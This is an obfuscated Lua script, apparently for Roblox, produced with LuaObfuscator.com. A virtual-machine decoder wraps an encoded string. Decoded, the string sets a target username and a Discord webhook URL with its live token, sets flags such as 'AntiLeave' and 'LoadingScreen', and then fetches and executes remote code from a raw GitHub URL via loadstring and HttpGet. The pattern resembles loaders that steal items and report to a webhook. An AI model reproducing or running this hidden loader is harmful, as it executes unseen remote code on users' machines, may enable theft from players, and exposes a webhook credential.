--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v98=v5(v83,v19);v19=nil;return v98;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==(0 -0)) then v85=(v31/((3 -1)^(v32-1)))%(2^(((v33-(2 -1)) -(v32-(620 -((790 -235) + 64)))) + ((1997 -(68 + 997)) -((2127 -(226 + 1044)) + 74)))) ;return v85-(v85%(569 -(367 + 201))) ;end end else local v86=927 -(214 + 713) ;local v87;while true do if (v86==(0 + 0)) then v87=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v87 + v87))>=v87) and (1638 -(1523 + 114))) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + 1 + 3 ;return (v40 * (16778173 -(892 + (120 -55)))) + (v39 * (120312 -54776)) + (v38 * (610 -(704 -(87 + 263)))) + v37 ;end local function v24()local v41=180 -(67 + 113) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(1 + 0)) then v44=1;v45=(v20(v43,2 -(431 -(44 + 386)) ,15 + (1491 -(998 + 488)) ) * ((7 -5)^(984 -(802 + 150)))) + v42 ;v41=5 -3 ;end if ((3 -1)==v41) then v46=v20(v43,16 + 5 ,1028 -(915 + 82) );v47=((v20(v43,90 -58 )==(1 + 0)) and  -1) or (1 -0) ;v41=1190 -(1069 + 118) ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1 -0 ;end if (v41==(1 + 0 + 2)) then if (v46==(0 -0)) then if (v45==(0 + 0)) then return v47 * 0 ;else local v99=0;while true do if (v99==(791 -(368 + 423))) then v46=3 -(2 + 0) ;v44=18 -(10 + 8) ;break;end end end elseif (v46==(7874 -5827)) then return ((v45==(442 -(416 + 26))) and (v47 * ((3 -2)/0))) or (v47 * NaN) ;end return v8(v47,v46-(440 + 583) ) * (v44 + (v45/((3 -1)^((1262 -(201 + 571)) -((1283 -(116 + 1022)) + 293))))) ;end end end local function v25(v48)local v49=0;local v50;local v51;while true do if (v49==((897 -(261 + 624)) -9)) then return v6(v51);end if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(3 -(3 -1)) );v18=v18 + v48 ;v49=7 -(1085 -(1020 + 60)) ;end if (0==v49) then v50=nil;if  not v48 then v48=v23();if (v48==(859 -(814 + 45))) then return "";end end v49=2 -1 ;end if ((1 + 1)==v49) then v51={};for v91=1, #v50 do v51[v91]=v2(v1(v3(v50,v91,v91)));end v49=2 + 1 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (3==v52) then v59=nil;v60=nil;v52=245 -(187 + 54) ;end if ((784 -(162 + 618))==v52) then v61=nil;while true do if (v53==(1 + 0)) then local v97=0 + 0 ;while true do if (v97~=(0 -0)) then else v56=nil;v57=nil;v97=1 -0 ;end if (v97==(1 + 0)) then v53=1638 -(1373 + 263) ;break;end end end if (v53==4) then while true do if (v54==(1001 -(451 + 549))) then v57=nil;v58=nil;v54=2;end if (v54==(0 + 0)) then local v100=0;local v101;while true do if (v100~=0) then else v101=0 -0 ;while true do if (v101==(1 -0)) then v54=1;break;end if (v101==0) then local v151=1384 -(746 + 638) ;while true do if (v151==1) then v101=1;break;end if (v151~=0) then else v55=0;v56=nil;v151=1;end end end end break;end end end if (v54==(1 + 1)) then local v102=0 -0 ;local v103;while true do if (v102~=(341 -(218 + 123))) then else v103=0;while true do if (v103==1) then v54=1584 -(1535 + 46) ;break;end if (v103~=0) then else local v152=0;while true do if (v152==(1 + 0)) then v103=1;break;end if ((0 + 0)~=v152) then else v59=nil;v60=nil;v152=561 -(306 + 254) ;end end end end break;end end end if ((1 + 2)==v54) then v61=nil;while true do local v104=0 -0 ;local v105;while true do if (v104==0) then v105=0;while true do if (v105==0) then if (v55~=1) then else local v158=0;while true do if (v158~=(1467 -(899 + 568))) then else local v166=0;while true do if (v166==0) then local v167=0 + 0 ;while true do if (v167~=1) then else v166=1;break;end if (v167~=0) then else v59={v56,v57,nil,v58};v60=v23();v167=291 -(60 + 230) ;end end end if (v166~=1) then else v158=573 -(426 + 146) ;break;end end end if (v158==1) then v61={};v55=2;break;end end end if (v55~=3) then else local v159=0;local v160;while true do if ((0 + 0)==v159) then v160=1456 -(282 + 1174) ;while true do if (v160~=0) then else local v168=811 -(569 + 242) ;while true do if (v168==0) then for v175=2 -1 ,v23() do v57[v175-(1 + 0) ]=v28();end return v59;end end end end break;end end end v105=1025 -(706 + 318) ;end if ((1252 -(721 + 530))==v105) then if (v55==(1273 -(945 + 326))) then local v161=0 -0 ;local v162;while true do if (v161~=(0 + 0)) then else v162=700 -(271 + 429) ;while true do if (0==v162) then local v169=0;while true do if ((0 + 0)~=v169) then else for v177=1,v60 do local v178=0;local v179;local v180;while true do if (v178==0) then v179=v21();v180=nil;v178=1;end if ((1501 -(1408 + 92))==v178) then if (v179==(1087 -(461 + 625))) then v180=v21()~=(1288 -(993 + 295)) ;elseif (v179==(1 + 1)) then v180=v24();elseif (v179==(1174 -(418 + 753))) then v180=v25();end v61[v177]=v180;break;end end end v59[3]=v21();v169=1 + 0 ;end if (v169==(1 + 0)) then v162=1;break;end end end if (v162==(1 + 0)) then for v170=1 + 0 ,v23() do local v171=0;local v172;local v173;while true do if (v171==(529 -(406 + 123))) then local v181=0;while true do if (v181~=1) then else v171=1770 -(1749 + 20) ;break;end if ((0 + 0)==v181) then v172=0;v173=nil;v181=1323 -(1249 + 73) ;end end end if ((1 + 0)==v171) then while true do if (0~=v172) then else v173=v21();if (v20(v173,1146 -(466 + 679) ,1)==(0 -0)) then local v183=0 -0 ;local v184;local v185;local v186;local v187;local v188;while true do if (v183==0) then v184=1900 -(106 + 1794) ;v185=nil;v183=1 + 0 ;end if (v183==2) then v188=nil;while true do if (v184==1) then local v189=0 + 0 ;while true do if (v189~=1) then else v184=2;break;end if (v189==0) then v187=nil;v188=nil;v189=2 -1 ;end end end if (v184==0) then v185=0 -0 ;v186=nil;v184=1;end if (v184==(116 -(4 + 110))) then while true do if (v185==1) then local v190=0;while true do if (v190==1) then v185=586 -(57 + 527) ;break;end if ((1427 -(41 + 1386))==v190) then v188={v22(),v22(),nil,nil};if (v186==(0 -0)) then local v199=166 -(122 + 44) ;local v200;while true do if (0==v199) then v200=0 -0 ;while true do if (v200~=(0 -0)) then else v188[3]=v22();v188[4 + 0 ]=v22();break;end end break;end end elseif (v186==1) then v188[1 + 2 ]=v23();elseif (v186==2) then v188[3]=v23() -((3 -1)^16) ;elseif (v186==3) then local v205=65 -(30 + 35) ;local v206;while true do if (v205==(0 + 0)) then v206=1257 -(1043 + 214) ;while true do if (v206~=(0 -0)) then else v188[3]=v23() -(2^(1228 -(323 + 889))) ;v188[10 -6 ]=v22();break;end end break;end end end v190=1;end end end if (2~=v185) then else if (v20(v187,1,581 -(361 + 219) )~=(321 -(53 + 267))) then else v188[2]=v61[v188[2]];end if (v20(v187,1 + 1 ,415 -(15 + 398) )~=1) then else v188[3]=v61[v188[985 -(18 + 964) ]];end v185=3;end if (v185~=0) then else local v191=0;while true do if (0==v191) then v186=v20(v173,7 -5 ,2 + 1 );v187=v20(v173,3 + 1 ,6);v191=851 -(20 + 830) ;end if (v191==(1 + 0)) then v185=127 -(116 + 10) ;break;end end end if (3==v185) then if (v20(v187,1 + 2 ,741 -(542 + 196) )==1) then v188[8 -4 ]=v61[v188[2 + 2 ]];end v56[v170]=v188;break;end end break;end end break;end if ((1 + 0)~=v183) then else v186=nil;v187=nil;v183=2;end end end break;end end break;end end end v55=2 + 1 ;break;end end break;end end end if (v55==0) then local v163=0;local v164;local v165;while true do if (v163~=(2 -1)) then else while true do if (v164==0) then v165=0;while true do if ((0 -0)~=v165) then else v56={};v57={};v165=1552 -(1126 + 425) ;end if (v165==1) then v58={};v55=406 -(118 + 287) ;break;end end break;end end break;end if (v163~=(0 -0)) then else v164=1121 -(118 + 1003) ;v165=nil;v163=2 -1 ;end end end break;end end break;end end end break;end end break;end if ((377 -(142 + 235))==v53) then v54=0 -0 ;v55=nil;v53=1;end if (v53~=2) then else v58=nil;v59=nil;v53=3;end if (v53==3) then v60=nil;v61=nil;v53=4;end end break;end if (v52==(0 + 0)) then v53=977 -(553 + 424) ;v54=nil;v52=1;end if (v52~=2) then else v57=nil;v58=nil;v52=5 -2 ;end if (v52==1) then v55=nil;v56=nil;v52=2 + 0 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + 1 ];else v78[v88]=v75[v88 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=9) then if (v81<=4) then if (v81<=1) then if (v81==0) then local v106=v80[2];v78[v106]=v78[v106](v13(v78,v106 + 1 ,v73));else local v108=v80[2];local v109,v110=v71(v78[v108](v13(v78,v108 + 1 ,v80[3])));v73=(v110 + v108) -1 ;local v111=0;for v130=v108,v73 do local v131=0;while true do if (v131==0) then v111=v111 + 1 ;v78[v130]=v109[v111];break;end end end end elseif (v81<=2) then v78[v80[2]]();elseif (v81==3) then do return;end else local v135=0;local v136;local v137;while true do if (v135==0) then v136=v80[2];v137=v78[v80[3]];v135=1;end if (v135==1) then v78[v136 + 1 ]=v137;v78[v136]=v137[v80[4]];break;end end end elseif (v81<=6) then if (v81==5) then v78[v80[2]]=v64[v80[3]];else local v114=v80[2];local v115=v78[v80[3]];v78[v114 + 1 ]=v115;v78[v114]=v115[v80[4]];end elseif (v81<=7) then v64[v80[3]]=v78[v80[2]];elseif (v81==8) then v78[v80[2]]=v80[3];else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=14) then if (v81<=11) then if (v81==10) then do return;end else local v121=v80[2];local v122,v123=v71(v78[v121](v13(v78,v121 + 1 ,v80[3])));v73=(v123 + v121) -1 ;local v124=0;for v132=v121,v73 do v124=v124 + 1 ;v78[v132]=v122[v124];end end elseif (v81<=12) then v64[v80[3]]=v78[v80[2]];elseif (v81>13) then v78[v80[2]]=v80[3]~=0 ;else local v143=v80[2];v78[v143]=v78[v143](v13(v78,v143 + 1 ,v73));end elseif (v81<=16) then if (v81>15) then v78[v80[2]]=v80[3];else v78[v80[2]]();end elseif (v81<=17) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==18) then v78[v80[2]]=v64[v80[3]];else v78[v80[2]][v80[3]]=v80[4];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D6503083O00736361726E52757303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3134313037313331372O32383036303730322F7942473065476B684B306A43342O665753514A483865414961463448304432556F3263765950572O505474484659484647304F4773522D7757674A36615677706D574B4203093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747300153O0012103O00023O0012073O00013O0012103O00043O0012073O00033O0012103O00023O0012073O00053O0012053O00063O0030093O000700080012053O00063O0030093O000900080012053O00063O0030093O000A00080012053O000B3O0012050001000C3O00200400010001000D0012100003000E4O0011000400014O000B000100044O000D5O00022O000F3O000100012O000A3O00017O00",v9(),...);
